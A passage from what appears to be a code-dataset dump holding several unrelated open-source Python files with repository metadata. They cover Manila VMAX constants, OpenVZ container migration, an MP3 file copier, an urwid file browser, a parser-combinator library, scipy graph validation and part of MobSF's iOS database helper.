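formatDVDmenuText above expands $-placeholders by chained str.replace calls. A self-contained sketch of that expansion idea with invented values (the real method derives them from the recording's DVB metadata, not from a dict):

# Standalone sketch of $-placeholder expansion; values are made up.
def expand(template, values):
    for key, val in values.items():
        template = template.replace(key, val)
    return template

print(expand("$i. $t ($C)", {"$i": "1", "$t": "Evening News", "$C": "BBC One"}))
# -> "1. Evening News (BBC One)"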
vponomaryov/manila
manila/share/drivers/dell_emc/plugins/vmax/constants.py
1
1753
# Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

STATUS_OK = 'ok'
STATUS_INFO = 'info'
STATUS_DEBUG = 'debug'
STATUS_WARNING = 'warning'
STATUS_ERROR = 'error'
STATUS_NOT_FOUND = 'not_found'

MSG_GENERAL_ERROR = '13690601492'
MSG_INVALID_VDM_ID = '14227341325'
MSG_INVALID_MOVER_ID = '14227341323'

MSG_FILESYSTEM_NOT_FOUND = "18522112101"
MSG_FILESYSTEM_EXIST = '13691191325'

MSG_VDM_EXIST = '13421840550'

MSG_SNAP_EXIST = '13690535947'

MSG_INTERFACE_NAME_EXIST = '13421840550'
MSG_INTERFACE_EXIST = '13691781136'
MSG_INTERFACE_INVALID_VLAN_ID = '13421850371'
MSG_INTERFACE_NON_EXISTENT = '13691781134'

MSG_JOIN_DOMAIN = '13157007726'
MSG_UNJOIN_DOMAIN = '13157007723'

# Necessary to retry when VMAX database is locked for provisioning operation
MSG_CODE_RETRY = '13421840537'

IP_ALLOCATIONS = 2

CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'}

XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api'

CIFS_ACL_FULLCONTROL = 'fullcontrol'
CIFS_ACL_READ = 'read'

SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
apache-2.0
1,427,866,968,296,748,000
30.872727
78
0.731888
false
avagin/p.haul
p_haul_ovz.py
1
4646
#
# OpenVZ containers hauler module
#

import os
import shutil
import p_haul_cgroup
import p_haul_netifapi as netif
import p_haul_fsapi as fsapi
import p_haul_netapi as netapi
import fs_haul_shared
import fs_haul_subtree

name = "ovz"
vzpid_dir = "/var/lib/vzctl/vepid/"
vz_dir = "/vz"
vzpriv_dir = "%s/private" % vz_dir
vzroot_dir = "%s/root" % vz_dir
vz_conf_dir = "/etc/vz/conf/"
vz_pidfiles = "/var/lib/vzctl/vepid/"
cg_image_name = "ovzcg.img"

class p_haul_type:
    def __init__(self, id):
        self._ctid = id
        #
        # This list would contain (v_in, v_out, v_br) tuples where
        # v_in is the name of veth device in CT
        # v_out is its peer on the host
        # v_bridge is the bridge to which thie veth is attached
        #
        self._veths = []
        self._cfg = []

    def __load_ct_config(self, dir):
        print "Loading config file from %s" % dir
        ifd = open(os.path.join(dir, self.__ct_config()))
        for line in ifd:
            self._cfg.append(line)
            if line.startswith("NETIF="):
                #
                # Parse and keep veth pairs, later we will
                # equip restore request with this data and
                # will use it while (un)locking the network
                #
                v_in = None
                v_out = None
                v_bridge = None
                vs = line.strip().split("=", 1)[1].strip("\"")
                for parm in vs.split(","):
                    pa = parm.split("=")
                    if pa[0] == "ifname":
                        v_in = pa[1]
                    elif pa[0] == "host_ifname":
                        v_out = pa[1]
                    elif pa[0] == "bridge":
                        v_bridge = pa[1]
                if v_in and v_out:
                    print "\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge)
                    veth = netapi.net_dev()
                    veth.name = v_in
                    veth.pair = v_out
                    veth.link = v_bridge
                    self._veths.append(veth)
        ifd.close()

    def __apply_cg_config(self):
        print "Applying CT configs"
        # FIXME -- implement
        pass

    def id(self):
        return (name, self._ctid)

    def init_src(self):
        self._fs_mounted = True
        self._bridged = True
        self.__load_ct_config(vz_conf_dir)

    def init_dst(self):
        self._fs_mounted = False
        self._bridged = False

    def root_task_pid(self):
        pf = open(os.path.join(vzpid_dir, self._ctid))
        pid = pf.read()
        return int(pid)

    def __ct_priv(self):
        return "%s/%s" % (vzpriv_dir, self._ctid)

    def __ct_root(self):
        return "%s/%s" % (vzroot_dir, self._ctid)

    def __ct_config(self):
        return "%s.conf" % self._ctid

    #
    # Meta-images for OVZ -- container config and info about CGroups
    #
    def get_meta_images(self, dir):
        cg_img = os.path.join(dir, cg_image_name)
        p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img)
        cfg_name = self.__ct_config()
        return [ (os.path.join(vz_conf_dir, cfg_name), cfg_name), \
                 (cg_img, cg_image_name) ]

    def put_meta_images(self, dir):
        print "Putting config file into %s" % vz_conf_dir
        self.__load_ct_config(dir)
        ofd = open(os.path.join(vz_conf_dir, self.__ct_config()), "w")
        ofd.writelines(self._cfg)
        ofd.close()
        # Keep this name, we'll need one in prepare_ct()
        self.cg_img = os.path.join(dir, cg_image_name)

    #
    # Create cgroup hierarchy and put root task into it
    # Hierarchy is unlimited, we will apply config limitations
    # in ->restored->__apply_cg_config later
    #
    def prepare_ct(self, pid):
        p_haul_cgroup.restore_hier(pid, self.cg_img)

    def __umount_root(self):
        print "Umounting CT root"
        os.system("umount %s" % self.__ct_root())
        self._fs_mounted = False

    def mount(self):
        nroot = self.__ct_root()
        print "Mounting CT root to %s" % nroot
        if not os.access(nroot, os.F_OK):
            os.makedirs(nroot)
        os.system("mount --bind %s %s" % (self.__ct_priv(), nroot))
        self._fs_mounted = True
        return nroot

    def umount(self):
        if self._fs_mounted:
            self.__umount_root()

    def get_fs(self):
        rootfs = fsapi.path_to_fs(self.__ct_priv())
        if not rootfs:
            print "CT is on unknown FS"
            return None

        print "CT is on %s" % rootfs

        if rootfs == "nfs":
            return fs_haul_shared.p_haul_fs()
        if rootfs == "ext3" or rootfs == "ext4":
            return fs_haul_subtree.p_haul_fs(self.__ct_priv())

        print "Unknown CT FS"
        return None

    def restored(self, pid):
        print "Writing pidfile"
        pidfile = open(os.path.join(vz_pidfiles, self._ctid), 'w')
        pidfile.write("%d" % pid)
        pidfile.close()

        self.__apply_cg_config()

    def net_lock(self):
        for veth in self._veths:
            netif.ifdown(veth[1])

    def net_unlock(self):
        for veth in self._veths:
            netif.ifup(veth[1])
            if veth[2] and not self._bridged:
                netif.bridge_add(veth[1], veth[2])

    def can_migrate_tcp(self):
        return True

    def veths(self):
        #
        # Caller wants to see list of tuples with [0] being name
        # in CT and [1] being name on host. Just return existing
        # tuples, the [2] with bridge name wouldn't hurt
        #
        return self._veths
lgpl-2.1
7,124,431,274,139,254,000
23.197917
67
0.63022
false
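__load_ct_config above recovers veth pairs from the container's NETIF= config line. A standalone sketch of that parsing on a made-up line (the mac key is just an example of a field the code ignores):

# Hypothetical OVZ config line in the format parsed by __load_ct_config.
line = 'NETIF="ifname=eth0,mac=00:18:51:C7:10:ED,host_ifname=veth101.0,bridge=br0"'

vs = line.strip().split("=", 1)[1].strip('"')
pairs = dict(parm.split("=", 1) for parm in vs.split(","))
print(pairs["ifname"], pairs["host_ifname"], pairs.get("bridge"))
# -> eth0 veth101.0 br0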
jima80525/pyres
pyres/filemanager.py
1
4287
""" manages the files on the mp3 player """ import os import re import logging import shutil import pyres.utils as utils def _double_digit_name(name): """ Makes all numbers two digit numbers by adding a leading 0 where necessary. Three digit or longer numbers are unaffected. """ # do a little clean up to start with name = name.rstrip().replace('\\', '/') name = name.rstrip('/') # make sure we don't have trailing / chars # now pull of the trailing '3' on .mp3 filenames so we don't convert that mp3suffix = '' if name.endswith('mp3'): name = name[:-1] mp3suffix = '3' # the regex produces a empty string at the end, skip that or zfill will # expand it to 00. Note we cannot just remove the last element from the # split as it does not always produce an empty element. Joy elements = re.split(r'(\d+)', name) if elements[-1] == '': elements.pop() result = "" # this next section is a bit goofy. We need to tell whether a given # element is a number (\d+) or not. Only if it's a number do we want to do # the zfill on it. Else a name like '1b1a1z.1mp3' ends up adding a zero to # the b a and z elements as well as the 1s. (in other words that string # ends up with '010b010a010z.01mp3' instead of '01b01a01z.01mp3') # It might be possible to be clever about the regex grouping on the split, # but that idea is escaping me presently. for element in elements: try: int(element) except ValueError: result += element else: result += element.zfill(2) result += mp3suffix return re.sub(' +', ' ', result) # remove double spaces class FileManager(object): """ Class to manage filesystem on mp3 player """ def __init__(self, base_dir): # set default value for mp3 player # base_dir = base_dir or "TestFiles" base_dir = base_dir or "/media/jima/3C33-7AC4/" self.base_dir = base_dir utils.mkdir_p(self.base_dir) def does_filesystem_exist(self): """ Tests for existence - this is unused in real code, but it's handy for unit tests. It was originally added to keep lint happy. """ return os.path.exists(self.base_dir) def copy_audiobook(self, source_dir, dest_dir=None): """ Main routine to convert and copy files to mp3 player """ if not dest_dir: dest_dir = source_dir print("Copying audiobook from %s" % source_dir) else: print("Coping audiobook from %s to %s" % (source_dir, dest_dir)) for root, dirs, files in os.walk(source_dir): dirs.sort() for dir_name in dirs: full_dir = os.path.join(root, _double_digit_name(dir_name)) utils.mkdir_p(os.path.join(self.base_dir, full_dir)) for filename in sorted(files): file_name = os.path.join(root, filename) newfile = _double_digit_name(os.path.join(self.base_dir, dest_dir, file_name)) logging.debug("copying %s to %s", file_name, newfile) print("copying to %s" % (newfile)) shutil.copyfile(file_name, newfile) def copy_episodes_to_player(self, episodes): """ Copies the episodes to the mp3 player """ # make sure the podcast directory exists podcast_dir = os.path.join(self.base_dir, "podcasts_" + utils.current_date_time_as_string()) utils.mkdir_p(podcast_dir) total = len(episodes) counter = 0 for episode in sorted(episodes, key=lambda x: x.date): episode.file_name = episode.file_name.replace('\\', '/') (_, tail) = os.path.split(episode.file_name) newfile = os.path.join(podcast_dir, tail) logging.debug("copying %s to %s", episode.file_name, newfile) shutil.copyfile(episode.file_name, newfile) counter += 1 logging.debug("copied %s to %s", episode.file_name, newfile) print("%2d/%d: copied %s to %s" % (counter, total, episode.file_name, newfile))
mit
-3,073,739,497,052,079,000
40.621359
79
0.586191
false
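_double_digit_name's behaviour can be checked directly; the expected outputs below follow from the function's own comments (importing a leading-underscore helper like this is for demonstration only):

from pyres.filemanager import _double_digit_name

print(_double_digit_name("Chapter 1/Part 2.mp3"))  # Chapter 01/Part 02.mp3
print(_double_digit_name("1b1a1z.1mp3"))           # 01b01a01z.01mp3 (from the comment above)
print(_double_digit_name("Part 117.mp3"))          # Part 117.mp3 (3+ digit numbers unchanged)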
bmars/sisko
sisko/app.py
1
4908
# Copyright (C) 2014 Brian Marshall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from operator import attrgetter

from gi.repository import Gio
import urwid

from sisko.widgets import Dialog, OverlayStack, PathBar, FileItem

# Vim-like cursor movement.
urwid.command_map['k'] = 'cursor up'
urwid.command_map['j'] = 'cursor down'
urwid.command_map['h'] = 'cursor left'
urwid.command_map['l'] = 'cursor right'

class Application:
    """ Main application class. """

    _PALETTE = [('dialog', 'black', 'light gray'),
                ('focused', 'white', 'dark blue'),
                ('folder', 'bold', ''),
                ('folder focused', 'white, bold', 'dark blue'),
                ('footer', 'light gray', 'dark gray'),
                ('footer key', 'white, bold', 'black'),
                ('path-bar', 'white', 'black'),
                ('path-bar current', 'white, bold', 'dark gray')]

    _FOOTER = [('footer key', " Alt+H "), " ", _("Hidden Files"), " ",
               ('footer key', " Q "), " ", _("Quit")]

    def __init__(self):
        self._path_bar = PathBar()
        self._files = urwid.SimpleFocusListWalker([])
        self._toplevel = OverlayStack(urwid.Frame(
            urwid.ListBox(self._files), header=self._path_bar,
            footer=urwid.AttrMap(urwid.Text(self._FOOTER), 'footer')))
        self._show_hidden = False

    def run(self, folder: Gio.File):
        """ Run the application, opening the given folder. """
        self._open(folder)
        main = urwid.MainLoop(self._toplevel, self._PALETTE,
                              unhandled_input=self._unhandled_input)
        main.screen.set_terminal_properties(bright_is_bold=False)
        main.run()

    def _open(self, folder: Gio.File):
        """ Open a folder. """
        children = folder.enumerate_children(
            ','.join([Gio.FILE_ATTRIBUTE_STANDARD_IS_HIDDEN,
                      Gio.FILE_ATTRIBUTE_STANDARD_IS_BACKUP,
                      Gio.FILE_ATTRIBUTE_STANDARD_NAME,
                      FileItem.FILE_ATTRIBUTES]),
            Gio.FileQueryInfoFlags.NONE, None)
        self._path_bar.location = folder
        del self._files[:]
        for info in children:
            if self._show_hidden or not (info.get_is_hidden() or
                                         info.get_is_backup()):
                self._files.append(FileItem(folder.get_child(info.get_name()),
                                            info))
        list.sort(self._files, key=attrgetter('name_key'))

    def _open_focused(self):
        """ Open the focused folder. """
        focus = self._files.get_focus()[0]
        if (focus is not None and
                focus.info.get_file_type() == Gio.FileType.DIRECTORY):
            self._open(focus.file)

    def _trash_focused(self):
        """ Move the focused file to the Trash. """
        focus = self._files.get_focus()[0]
        if focus is None:
            return
        dialog = Dialog(
            _("Are you sure you want to move \"{}\" to the Trash?").format(
                focus.info.get_display_name()),
            [(_("Cancel"), 'cancel'), (_("Move to Trash"), 'trash')])
        def on_response(response_id):
            if response_id == 'trash':
                focus.file.trash(None)
                del self._files[self._files.index(focus)]
        self._toplevel.show_dialog(dialog, on_response)

    def _unhandled_input(self, key):
        """ Handle application key commands. """
        if urwid.command_map[key] == 'cursor left':
            # Open previous folder in the path.
            if self._path_bar.previous is not None:
                self._open(self._path_bar.previous)
        elif urwid.command_map[key] == 'cursor right':
            # Open next folder in the path.
            if self._path_bar.next is not None:
                self._open(self._path_bar.next)
        elif urwid.command_map[key] == 'activate':
            self._open_focused()
        elif key == 'delete':
            self._trash_focused()
        elif key == 'meta h':
            self._show_hidden = not self._show_hidden
            self._open(self._path_bar.location)
        elif key in ('Q', 'q'):
            raise urwid.ExitMainLoop
gpl-3.0
5,710,978,842,891,577,000
36.753846
78
0.556031
false
loehnertj/bsbgateway
bsbgateway/util/jos_parser.py
1
15340
##############################################################################
#
#    Copyright (C) Johannes Loehnert, 2013-2015
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Lesser General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Lesser General Public License for more details.
#
#    You should have received a copy of the GNU Lesser General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

import re

__all__ = [
    "Token",
    "AstNode",
    "ParserContext",
    "StackTrace",
    "seq",
    "multiple",
    "optional",
    "anyof",
    "generate_lexer", "re",
    "generate_parser",
]

class Token(object):
    ntype=0
    content=None
    srcoffset = 0

    def __init__(o, ntype, content=None, srcoffset=0):
        o.ntype = ntype
        o.content = content
        o.srcoffset = srcoffset

    def __unicode__(o):
        if not o.content:
            return o.ntype
        content = o.content
        if not isinstance(content, unicode):
            content = unicode(content)
        if len(content)> 40:
            content = content[:37] + u"..."
        return unicode(o.ntype) + u"<" + content.replace("\n", "\n ") + u">"

    def __str__(o):
        if not o.content:
            return o.ntype
        content = o.content
        if not isinstance(content, str):
            content = str(content) # may throw encode error!!!
        if len(content)> 40:
            content = content[:37] + "..."
        return o.ntype + "<" + content.replace("\n", "\n ") + ">"

    __repr__ = __str__

    def __call__(o):
        return o.content

class AstNode:
    """represents a node of the abstract syntax tree

    sequence is a list of the children. Its items can be Tokens and AstNodes,
    mixing is allowed. Take care: a single Token object is a valid tree!!

    The tree structure will match the given grammar.
    """
    ntype = ""
    _children = None

    def __init__(o, ntype, children):
        o.ntype = ntype
        o._children = children

    def __str__(o):
        s = o.ntype
        for c in o._children:
            s = s + "\n" + str(c).replace("\n", "\n ")
        return s

    def __unicode__(o):
        s = unicode(o.ntype)
        for c in o._children:
            s = s + u"\n" + unicode(c).replace("\n", "\n ")
        return s

    def __getattr__(o, ntype):
        """gets the child node(s) having the given ntype.
        Returns list of children that matches."""
        result = []
        for c in o._children:
            if c.ntype == ntype:
                result.append(c)
        return result

    def __iter__(o):
        """iterates over the children of this node."""
        return o._children.__iter__()

    def __call__(o):
        """return token content of this subtree.

        The subtree must contain 0 or 1 token, multiple tokens cause an Exception.
        Returns token.content (None if no token is there)."""
        result = [c() for c in o._children]
        result = [x for x in result if x is not None]
        if len(result)>1:
            raise ValueError("More than one token in subtree '%s'"%o.ntype)
        if len(result)==0:
            return None
        return result[0]

    def __getitem__(o, key):
        if isinstance(key, basestring):
            l = o.__getattr__(key)
            if len(l) > 1:
                raise ValueError("more than one %s child"%key)
            if len(l)==0:
                return None
            return l[0]
        else:
            return o._children[key]

    content = property(__call__)

class ParserContext:
    def __init__(o, tokens, ruleset):
        o.tokens = tokens
        o.ruleset = ruleset.copy()
        o.stack_trace = None
        o.stack = []

    def push(o, symbol):
        '''processor should push HIS OWN name before calling subprocessors,
        and .pop() afterwards.'''
        o.stack.append(symbol)

    def pop(o):
        o.stack.pop()

    def mktrace(o, symbol, errdescription="", reached_position=-1):
        """create a stack trace and remember it if a bigger position was reached."""
        trace = StackTrace(o.stack+[symbol], errdescription, reached_position)
        # remember the trace if there is none remembered, if it reached a bigger
        # position than the last one, or if it extends the last remembered one.
        if o.stack_trace is None \
           or o.stack_trace.reached_position < trace.reached_position:
            o.stack_trace = trace
        return trace

class StackTrace:
    stack = []
    reached_position = -1
    errdescription = ""

    def __init__(o, stack, errdescription="", reached_position=-1):
        o.stack = stack[:]
        o.errdescription = errdescription
        o.reached_position = reached_position

    def __str__(o):
        return " ".join(o.stack) + " : '" + o.errdescription + "' (@token %d"%o.reached_position + ")"

def _convert(args):
    """reads the given list and replaces all strings with the corresponding
    _expect processor.
    """
    processors = list()
    for processor in args:
        # replace strings by the '_expect' processor.
        if isinstance(processor, basestring):
            processor = _expect(processor)
        processors.append(processor)
    return processors

# Processors: ==========================================================
# each of those functions returns a processor for the token stream.

#def process(pcontext, position):
#   trys to apply itself onto the tokens, if needed branches to another rule.
#   it starts at position (index into tokens).
#   Returns (partlist, new_position):
#       partlist := LIST of AstNodes and Tokens
#           StackTrace if not applicable.
#       new_position: where further parsing must continue

def _expect(text):
    """Expect processor: if text is lowercase, expect something matching that rule.
    if text is not lowercase, expect a token with that ntype.

    You do not need to use it directly. All strings given as argument to
    another processor are directly matched.
    """
    if text != text.lower():
        # expect that particular TOKEN
        def process(pcontext, position):
            tokens = pcontext.tokens
            if len(tokens) > position:
                token = tokens[position]
            else:
                # after end of stream there comes an infinite amount of EOF tokens.
Returns token.content (None if no token is there).""" result = [c() for c in o._children] result = [x for x in result if x is not None] if len(result)>1: raise ValueError("More than one token in subtree '%s'"%o.ntype) if len(result)==0: return None return result[0] def __getitem__(o, key): if isinstance(key, basestring): l = o.__getattr__(key) if len(l) > 1: raise ValueError("more than one %s child"%key) if len(l)==0: return None return l[0] else: return o._children[key] content = property(__call__) class ParserContext: def __init__(o, tokens, ruleset): o.tokens = tokens o.ruleset = ruleset.copy() o.stack_trace = None o.stack = [] def push(o, symbol): '''processor should push HIS OWN name before calling subprocessors, and .pop() afterwards.''' o.stack.append(symbol) def pop(o): o.stack.pop() def mktrace(o, symbol, errdescription="", reached_position=-1): """create a stack trace and remember it if a bigger position was reached.""" trace = StackTrace(o.stack+[symbol], errdescription, reached_position) # remember the trace if there is none remembered, if it reached longer than the last one, # or if it extends the last remembered one. if o.stack_trace is None \ or o.stack_trace.reached_position < trace.reached_position: o.stack_trace = trace return trace class StackTrace: stack = [] reached_position =-1 errdescription = "" def __init__(o, stack, errdescription="", reached_position=-1): o.stack = stack[:] o.errdescription = errdescription o.reached_position = reached_position def __str__(o): return " ".join(o.stack) + " : '" + o.errdescription + "' (@token %d"%o.reached_position + ")" def _convert(args): """reads the given list and replaces all strings with the corresponding _expect processor. """ processors = list() for processor in args: # replace strings by the '_expect' processor. if isinstance(processor, basestring): processor = _expect(processor) processors.append(processor) return processors # Processors: ========================================================== # each of those functions returns a processor for the token stream. #def process(pcontext, position): # trys to apply itself onto the tokens, if needed branches to another rule. # it starts at position (index into tokens). # Returns (partlist, new_position): # partlist := LIST of AstNodes and Tokens # StackTrace if not applicable. # new_position: where further parsing must continue def _expect(text): """Expect processor: if text is lowercase, expect something matching that rule. if text is not lowercase, expect a token with that ntype. You do not need to use it directly. All strings given as argument to another processor are directly matched. """ if text != text.lower(): # expect that particular TOKEN def process(pcontext, position): tokens = pcontext.tokens if len(tokens) > position: token = tokens[position] else: # after end of stream there comes an infinite amount of EOF tokens. 
token = Token("EOF", None) if token.ntype == text: return [token], position+1 else: return pcontext.mktrace("expect", errdescription="expected %s token"%text, reached_position=position), position else: # try whether the RULE applies def process(pcontext, position): pcontext.push("<%s>"%text) result, new_position = _try_rule(pcontext, position, text) pcontext.pop() if isinstance(result, StackTrace): return result, position else: return [result], new_position return process def seq(*args): """sequence processor: match the full sequence given as arguments.""" processors = _convert(args) def process(pcontext, position): result = [] start_position = position for processor in processors: subresult, position = processor(pcontext, position) if isinstance(subresult, StackTrace): # parsing failed further down. # exception here: pass Stacktrace directly! return subresult, start_position else: # append returned list to my result result += subresult #success return result, position return process def multiple(*args): """multiple processor: match the sequence given as arguments n times (n>=0). """ subseq = seq(*args) def process(pcontext, position): result = [] while True: pcontext.push("multiple") subresult, new_position = subseq(pcontext, position) pcontext.pop() if isinstance(subresult, StackTrace): # ignore trace and return what you got so far break; # detect and break endless loop if len(subresult) == 0: subresult = pcontext.mktrace("multiple", errdescription="endless loop detected", reached_position = position) break; result += subresult position = new_position return result, position return process def optional(*args): """optional processor: match the full sequence given as argument, or empty list""" subseq = seq(*args) def process(pcontext, position): pcontext.push("optional") subresult, new_position = subseq(pcontext, position) pcontext.pop() # only thing we have to do is convert StackTrace (no match) into a valid match. if isinstance(subresult, StackTrace): return [], position else: return subresult, new_position return process def anyof(*args): """anyof processor: try the given processors in turn, return the first match. for alternative sequences, wrap them in seq(...). """ processors = _convert(args) if len(processors)==0: raise ArgumentError, "at least one alternative must be given to anyof" def process(pcontext, position): for processor in processors: pcontext.push("anyof") result, new_position = processor(pcontext, position) pcontext.pop() if not isinstance(result, StackTrace): return result, new_position # nothing matched return pcontext.mktrace("anyof", "no alternative matched", position), position return process # END of processor generators! ============================ def _try_rule(pcontext, position, rulename): """ takes a list of Tokens, the ruleset, and the name of the subtree rule. Returns the AST (tree of AstNodes and/or tokens), or StackTrace if parsing failed. """ processor = pcontext.ruleset[rulename] result, new_position = processor(pcontext, position) if isinstance(result, StackTrace): return result, position else: return AstNode(rulename, result), new_position def generate_lexer(symbols, re_flags): """generates a lexer function for the given symbol set. The symbol set is a list: ["SYMBOL1", "regex1", "SYMBOL2", "regex2", (...)]. Internally, re.Scanner is used. Look up the re module docs for regexp syntax. Applied to a source string, the lexer function returns a list of Tokens, ie. Token objects. Use the empty string "" as symbol for symbols to be ignored (e.g. 
whitespace). No Tokens are generated for those. Mark the content of the token by a capture group in the regexp. If there is a named group "content", it is set as Token content. If not, the first capture group is set as Token content. If there are no capture groups, content will be None. Known Bug: the first regex will always have a capture group, by default the whole match. If you want a token without content, put () at the end to make the first capture group an empty string. """ # factory that returns a specific token-generator. def factory(ntype, has_value): def mktoken(regex, match): if has_value: # From the construction of the regex, the group having the # index of the named group +1 is our value. content = match.group(regex.groupindex[ntype] + 1) else: content = None t = Token(ntype, content, match.start()) return t return mktoken regexs = [] symnames = [] funcs = {} for sym, regex in zip(symbols[::2], symbols[1::2]): if sym == "": regexs.append("r(%s)"%(sym)) else: symnames.append(sym) regexs.append(r"(?P<%s>%s)"%(sym, regex)) # check if the regex defines groups i.e. delivers a value p = re.compile(regex) funcs[sym] = factory(sym, (p.groups>0)) regex = re.compile("|".join(regexs), re_flags) def lexer(text): tokens = [] lastpos = 0 for match in regex.finditer(text): # find matched symbol groups = match.groupdict() for sym in symnames: if groups[sym]: tokens.append(funcs[sym](regex, match)) break; lastpos = match.end() return tokens, text[lastpos:] return lexer def generate_parser(ruleset, entrypoint=""): """generates a parser for the given grammar (ruleset). The ruleset must be a dictionary with: string keys (rulenames), which MUST be lowercase processor or string values. values: processors are callbacks built by nesting the functions seq, multiple, optional, anyof. string values match either another rule (if lowercase) or one token (if not lowercase). In the latter case, the string value is compared against the Token.ntype. by default, the rule "" (empty string as key) is used as entrypoint. You can give another entrypoint for testing parts of the grammar. """ rules = ruleset.copy() # convert string values into _expect for key in rules.keys(): if isinstance(rules[key], basestring): rules[key] = _expect(rules[key]) def parse(tokens): """ takes a list of Tokens. Returns (tree, pcontext) - tree: the AST (tree of AstNodes and/or tokens), or None if parsing failed. NOTE that a single Token is also a valid tree. pcontext: final state of parsing contest (for error location) .stack_trace: a StackTrace object if parsing failed .stack_trace.stack: list of called operators .stack_trace.reached_position: where the parser failed to continue use it to validate if everything was read, or for error messages. """ pcontext = ParserContext(tokens, rules) result, end_position = _try_rule(pcontext, 0, "") if isinstance(result, StackTrace): result = None print pcontext.stack_trace else: pcontext.stack_trace = None return result, pcontext return parse
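
# A minimal end-to-end sketch of the API above (illustrative; the symbol names
# and the grammar are made up): lex and parse a comma-separated integer list.
if __name__ == '__main__':
    lexer = generate_lexer([
        "NUM", r"(\d+)",
        "COMMA", r",",
        "", r"\s+",
    ], 0)
    tokens, rest = lexer("1, 2, 3")
    parser = generate_parser({
        "": seq("num", multiple("COMMA", "num")),
        "num": "NUM",
    })
    tree, pcontext = parser(tokens)
    print tree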
gpl-3.0
-6,327,910,968,418,215,000
36.93401
127
0.574185
false
beiko-lab/gengis
bin/Lib/site-packages/scipy/sparse/csgraph/_validation.py
1
2475
from __future__ import division, print_function, absolute_import import numpy as np from scipy.sparse import csr_matrix, isspmatrix, isspmatrix_csc, isspmatrix_csr from ._tools import csgraph_to_dense, csgraph_from_dense,\ csgraph_masked_from_dense, csgraph_from_masked DTYPE = np.float64 def validate_graph(csgraph, directed, dtype=DTYPE, csr_output=True, dense_output=True, copy_if_dense=False, copy_if_sparse=False, null_value_in=0, null_value_out=np.inf, infinity_null=True, nan_null=True): """Routine for validation and conversion of csgraph inputs""" if not (csr_output or dense_output): raise ValueError("Internal: dense or csr output must be true") # if undirected and csc storage, then transposing in-place # is quicker than later converting to csr. if (not directed) and isspmatrix_csc(csgraph): csgraph = csgraph.T if isspmatrix(csgraph): if csr_output: csgraph = csr_matrix(csgraph, dtype=DTYPE, copy=copy_if_sparse) else: csgraph = csgraph_to_dense(csgraph, null_value=null_value_out) elif np.ma.is_masked(csgraph): if dense_output: mask = csgraph.mask csgraph = np.array(csgraph.data, dtype=DTYPE, copy=copy_if_dense) csgraph[mask] = null_value_out else: csgraph = csgraph_from_masked(csgraph) else: if dense_output: csgraph = csgraph_masked_from_dense(csgraph, copy=copy_if_dense, null_value=null_value_in, nan_null=nan_null, infinity_null=infinity_null) mask = csgraph.mask csgraph = np.asarray(csgraph.data, dtype=DTYPE) csgraph[mask] = null_value_out else: csgraph = csgraph_from_dense(csgraph, null_value=null_value_in, infinity_null=infinity_null, nan_null=nan_null) if csgraph.ndim != 2: raise ValueError("compressed-sparse graph must be two dimensional") if csgraph.shape[0] != csgraph.shape[1]: raise ValueError("compressed-sparse graph must be shape (N, N)") return csgraph
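
# A small illustrative check (not part of scipy itself): with the default
# arguments, a dense input comes back dense, with null edges (0 here) mapped
# to np.inf.
if __name__ == '__main__':
    example = np.array([[0., 1., 2.],
                        [1., 0., 0.],
                        [2., 0., 0.]])
    print(validate_graph(example, directed=False))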
gpl-3.0
2,765,522,862,928,460,300
40.672414
79
0.560404
false
MobSF/Mobile-Security-Framework-MobSF
mobsf/StaticAnalyzer/views/ios/db_interaction.py
1
7363
"""Module holding the functions for the db.""" import logging from django.conf import settings from mobsf.MobSF.utils import python_dict, python_list from mobsf.StaticAnalyzer.models import StaticAnalyzerIOS from mobsf.StaticAnalyzer.models import RecentScansDB logger = logging.getLogger(__name__) def get_context_from_db_entry(db_entry): """Return the context for IPA/ZIP from DB.""" try: logger.info('Analysis is already Done. Fetching data from the DB...') context = { 'version': settings.MOBSF_VER, 'title': 'Static Analysis', 'file_name': db_entry[0].FILE_NAME, 'app_name': db_entry[0].APP_NAME, 'app_type': db_entry[0].APP_TYPE, 'size': db_entry[0].SIZE, 'md5': db_entry[0].MD5, 'sha1': db_entry[0].SHA1, 'sha256': db_entry[0].SHA256, 'build': db_entry[0].BUILD, 'app_version': db_entry[0].APP_VERSION, 'sdk_name': db_entry[0].SDK_NAME, 'platform': db_entry[0].PLATFORM, 'min_os_version': db_entry[0].MIN_OS_VERSION, 'bundle_id': db_entry[0].BUNDLE_ID, 'bundle_url_types': python_list(db_entry[0].BUNDLE_URL_TYPES), 'bundle_supported_platforms': python_list(db_entry[0].BUNDLE_SUPPORTED_PLATFORMS), 'icon_found': db_entry[0].ICON_FOUND, 'info_plist': db_entry[0].INFO_PLIST, 'binary_info': python_dict(db_entry[0].BINARY_INFO), 'permissions': python_list(db_entry[0].PERMISSIONS), 'ats_analysis': python_list(db_entry[0].ATS_ANALYSIS), 'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS), 